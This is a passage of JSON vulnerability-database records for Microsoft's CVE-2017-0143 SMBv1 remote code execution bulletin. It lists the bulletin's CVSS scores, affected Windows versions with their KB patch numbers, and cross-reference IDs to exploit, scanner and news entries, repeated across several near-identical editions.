"700099.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012598", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB4013198", "KBMS16-110, 3187754", "KB4012216", "KB3177186", "KB4012606", "KB3210721", "KB4012217", "KB3205409", "KB3210720", "KB4013429", "KB3212646", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:09:38", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-26T00:46:05", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-26T00:46:05", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-26T00:46:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB3205409", "KB4012213", "KB4012214", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3210721", "KB4012215", "KB3212646", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:46:05", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T08:53:53", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KBMS16-110, 3187754", "KB4012215", "KB4012212", "KB4012216", "KB3212646", "KB3205409", "KB3213986", "KB3177186", "KB4012598", "KB4012217", "KB4012606", "KB3210721", "KB4012214", "KB4013198", "KB4012213", "KB3205401", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, 